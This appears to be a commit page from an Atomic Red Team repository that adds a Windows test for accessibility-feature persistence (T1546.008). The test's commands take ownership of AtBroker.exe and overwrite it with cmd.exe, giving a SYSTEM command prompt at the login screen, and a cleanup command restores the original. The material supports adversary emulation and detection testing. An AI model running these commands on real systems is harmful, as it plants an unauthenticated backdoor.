security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

T1546.008 - Atomic Test Proposal (#3183)

Browse Source 
Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>
This commit is contained in:
Casey Hennings
2025-10-01 15:40:19 -04:00
committed by GitHub
parent a4bf8b76bd
commit eabf4e722d
1 changed files with 15 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1546.008/T1546.008.yaml
+15
View File
@@ -185,3 +185,18 @@ atomic_tests:
copy /Y C:\Windows\System32\DisplaySwitch_backup.exe C:\Windows\System32\DisplaySwitch.exe
name: command_prompt
elevation_required: true
- name: Replace AtBroker.exe (App Switcher binary) with cmd.exe
description: |
Replace AtBroker.exe (App Switcher binary) with cmd.exe. This allows the user to launch an elevated command prompt from the login screen by locking and then unlocking the computer after toggling on any of the accessibility tools in the Accessibility menu.
supported_platforms:
- windows
executor:
command: |
IF NOT EXIST C:\Windows\System32\AtBroker_backup.exe (copy C:\Windows\System32\AtBroker.exe C:\Windows\System32\AtBroker_backup.exe) ELSE ( pushd )
takeown /F C:\Windows\System32\AtBroker.exe /A
icacls C:\Windows\System32\AtBroker.exe /grant Administrators:F /t
copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\AtBroker.exe
cleanup_command: |
copy /Y C:\Windows\System32\AtBroker_backup.exe C:\Windows\System32\AtBroker.exe
name: command_prompt
elevation_required: true